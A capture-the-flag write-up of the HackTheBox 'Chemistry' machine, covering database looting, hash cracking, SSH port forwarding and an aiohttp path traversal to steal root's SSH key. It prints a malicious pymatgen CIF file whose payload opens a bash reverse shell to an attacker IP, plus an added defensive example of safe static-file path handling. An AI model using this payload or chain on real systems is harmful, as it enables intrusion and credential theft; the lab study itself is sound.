HackTheBox Chemistry - Part 2
This is the second part of the Chemistry Box in htb. Since we got a shell in the previous attempt, we will continue from there.
There is a DB file in the /instance folder. Let's try to access the database.
app@chemistry:~/instance$ ls
ls
database.db
app@chemistry:~/instance$ sqlite3 database.db
Something is wrong with the shell. The above command fails. Let's retry with a better bash shell.
Made some small changes to the evil CIF file (the listener address and port). The original version is shown first, followed by the modified one:
data_5yOhtAoR
_audit_creation_date 2018-06-08
_audit_creation_method "Pymatgen CIF Parser Arbitrary Code Execution Exploit"
loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.6/443 0>&1'");0,0,0'
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "
data_5yOhtAoR
_audit_creation_date 2018-06-08
_audit_creation_method "Pymatgen CIF Parser Arbitrary Code Execution Exploit"
loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.16/4444 0>&1'");0,0,0'
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "
and listen for the connection with nc -lnvp 4444. Now let's upgrade the shell with a pty. This should give it autocompletion, tab completion and other interactive features (I didn't get them, but the shell is stable).
Next, let's connect to the database and try to access some data.
The user table has hashed passwords. Let's try to crack it using CrackStation.
We got the Rosa user password. Now let's access Rosa's profile.
Now we have the user flag. Next, we need the root flag. Let's enumerate other services running on the host.
There is a monitoring script run by root listening on port 8080:
To reach it we need port forwarding. The service is bound to localhost on the remote server, so nobody outside can access it directly; we tunnel the traffic to a local port instead.
ssh -L 8080:127.0.0.1:8080 -N -vv rosa@10.10.11.38
The -L argument has the form local_port:remote_host:remote_port, so 8080:127.0.0.1:8080 forwards local port 8080 to port 8080 on the server's loopback interface.
It turned out to be a site monitoring service.
The browser's network tab shows that the service runs on aiohttp 3.9.1, so let's look for a known exploit for that version.
There is a path traversal issue we can use:
Reading through it, the traversal lies in the static file route. On this host the static route is not /static but /assets.
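The bug class here is a static file handler that joins the request path onto the static directory without checking that the resolved file still lies inside it. The following is an added example, not code from the post or from aiohttp: a naive resolver next to a hardened one, run against a constructed temp directory named assets (all names and probe paths are assumed for illustration).

```python
import os
import tempfile
from pathlib import Path
from typing import Dict, Optional, Tuple
from urllib.parse import unquote


def resolve_static_naive(root: Path, url_path: str) -> Path:
    """Pattern behind the bug class: join the request path onto the static
    directory and serve whatever the filesystem resolves it to."""
    return (root / unquote(url_path).lstrip("/")).resolve()


def resolve_static_safe(root: Path, url_path: str) -> Optional[Path]:
    """Hardened lookup: canonicalise both sides (symlinks included) and refuse
    anything whose final location is not under the static root."""
    root = root.resolve()
    rel = unquote(url_path).lstrip("/")
    if not rel or "\x00" in rel:
        return None
    candidate = (root / rel).resolve()
    try:
        candidate.relative_to(root)  # ValueError if the path escaped the root
    except ValueError:
        return None
    return candidate if candidate.is_file() else None


def demo() -> Dict[str, Tuple[bool, bool]]:
    """Constructed layout: assets/app.js is legitimate, secret.txt sits one
    level above the static root, and assets/link is a symlink pointing back
    out to the parent directory. Returns {probe: (naive_serves, safe_serves)}."""
    base = Path(tempfile.mkdtemp())
    assets = base / "assets"
    assets.mkdir()
    (assets / "app.js").write_text("console.log('ok')")
    (base / "secret.txt").write_text("constructed file outside the static root")
    os.symlink(base, assets / "link")  # symlink inside the root, target outside
    probes = ["/app.js", "/../secret.txt", "/..%2fsecret.txt", "/link/secret.txt"]
    return {
        p: (resolve_static_naive(assets, p).is_file(),
            resolve_static_safe(assets, p) is not None)
        for p in probes
    }


if __name__ == "__main__":
    for probe, (naive, safe) in demo().items():
        print(f"{probe:20} naive_serves={naive!s:5} safe_serves={safe}")
```

The naive resolver hands out secret.txt for the dot-dot, URL-encoded and symlink probes alike; the hardened one serves only app.js because the containment check runs on the fully resolved path.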
Now let's go after root's SSH private key.
Save it to a local file and use it to SSH in as root.
Thanks for following along, this was quite an interesting challenge, hope you have learned new stuff. Follow for more.